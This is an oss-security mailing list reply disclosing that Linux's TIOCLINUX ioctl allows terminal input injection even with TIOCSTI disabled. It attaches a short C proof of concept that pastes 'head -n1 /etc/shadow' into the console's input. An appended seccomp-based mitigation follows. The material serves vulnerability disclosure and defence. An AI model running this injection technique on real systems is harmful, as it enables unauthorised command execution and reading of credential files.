List:       oss-security
Subject:    Re: [oss-security] TTY pushback vulnerabilities / TIOCSTI
From:       Jakub Wilk <jwilk () jwilk ! net>
Date:       2023-03-14 10:36:26
Message-ID: 20230314103626.3ucbt2rjdfhjbe6t () jwilk ! net

* Hanno Böck <hanno@hboeck.de>, 2023-03-14 09:51:
>In the 2017 post Solar Designer mentioned that the Linux kernel
>developers have multiple times rejected changes in the kernel.

I believe this is the post in question:
https://www.openwall.com/lists/oss-security/2017/06/03/9

>Starting with Kernel 6.2 it is possible to disable TIOCSTI (unset 
>CONFIG_LEGACY_TIOCSTI).

Nice, but...

On Linux virtual terminals, it's possible to achieve pretty much the 
same effect using TIOCLINUX, the ioctl used by gpm to implement 
copy&pasting.

I've attached a minimal PoC. A more elaborate one is here:
https://github.com/jwilk/ttyjack

-- 
Jakub Wilk

["minittyjack.c" (text/x-csrc)]

#include <stdio.h>
#include <sys/ioctl.h>

#include <linux/tiocl.h>
#include <linux/vt.h>

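int main(void)
{
    /* Clear the screen and print the command text on the first line. */
    printf("\33[H\33[2J");
    printf("head -n1 /etc/shadow\n");
    fflush(stdout);
    /* TIOCLINUX takes a pointer to the subcode byte; the padding byte
       keeps the selection struct that follows it aligned. */
    struct {
        char padding;
        char subcode;
        struct tiocl_selection sel;
    } data = {
        .subcode = TIOCL_SETSEL,
        .sel = {
            .xs = 1, .ys = 1,
            .xe = 1, .ye = 1,
            .sel_mode = TIOCL_SELLINE
        }
    };
    /* Select the first screen line, as a mouse selection would. */
    ioctl(0, TIOCLINUX, &data.subcode);
    /* Paste the selection into the terminal's input queue. */
    data.subcode = TIOCL_PASTESEL;
    ioctl(0, TIOCLINUX, &data.subcode);
}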
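
A mitigation sketch for sandboxes, added here as an example; it is not part of the original message or of ttyjack. It installs a seccomp filter that refuses both pushback ioctls discussed in this thread (TIOCSTI and every TIOCLINUX subcode) for a process and its children. The function names are hypothetical, and it assumes a little-endian x86-64 or aarch64 Linux build.

```c
#include <errno.h>
#include <stddef.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#ifdef __aarch64__
#define NATIVE_ARCH AUDIT_ARCH_AARCH64
#else
#define NATIVE_ARCH AUDIT_ARCH_X86_64 /* assumption: otherwise an x86-64 build */
#endif
#define LD(field) BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, field))
#define JEQ(k, t, f) BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, (k), (t), (f))

/* Make TIOCSTI and TIOCLINUX (all subcodes) fail with EPERM here and in children. */
int deny_tty_pushback(void) {
    struct sock_filter insns[] = {
        LD(arch),               /* other ABIs number their syscalls differently */
        JEQ(NATIVE_ARCH, 1, 0),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS),
        LD(nr),
        BPF_JUMP(BPF_JMP | BPF_JGE | BPF_K, 0x40000000, 5, 0), /* x32 ABI bit: deny */
        JEQ(__NR_ioctl, 0, 3),  /* not ioctl: allow */
        LD(args[1]),            /* low 32 bits on little-endian; the kernel drops the rest */
        JEQ(TIOCSTI, 2, 0),
        JEQ(TIOCLINUX, 1, 0),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | EPERM),
    };
    struct sock_fprog prog = { .len = sizeof insns / sizeof insns[0], .filter = insns };
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0) return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog);
}

/* Fork, install the filter, try `request` on fd 0: 1 = refused, 0 = not, -1 = error. */
int blocked_after_filter(unsigned long request) {
    int status;
    pid_t pid = fork();
    if (pid == 0)  /* NULL argument: a refused request never touches memory */
        _exit(deny_tty_pushback() ? 2 : (ioctl(0, request, NULL) == -1 && errno == EPERM));
    if (pid < 0 || waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status) == 2 ? -1 : WEXITSTATUS(status);
}

int main(void) {  /* exit status 0 when both requests are refused */
    return !(blocked_after_filter(TIOCSTI) == 1 && blocked_after_filter(TIOCLINUX) == 1);
}
```

Refusing TIOCLINUX wholesale also stops legitimate users of the ioctl such as gpm, so the filter belongs on processes that have no reason to drive the console.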